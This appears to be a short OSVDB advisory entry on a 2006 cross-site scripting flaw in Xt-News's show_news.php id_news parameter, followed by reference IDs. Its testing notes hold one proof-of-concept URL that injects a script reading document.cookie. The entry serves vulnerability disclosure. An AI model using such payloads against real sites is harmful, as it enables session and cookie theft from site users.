Xt-News show_news.php id_news Variable XSS

2006-12-21T04:49:04
ID OSVDB:32439
Type osvdb
Reporter OSVDB
Modified 2006-12-21T04:49:04

Description

Manual Testing Notes

http://[target]/[script_news_path]/show_news.php?id_news='><script>alert(document.cookie)</script><foo '

References:

Secunia Advisory ID:23456 Related OSVDB ID: 32440 Related OSVDB ID: 32438 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0371.html ISS X-Force ID: 31145 FrSIRT Advisory: ADV-2006-5145 CVE-2006-6746 Bugtraq ID: 21719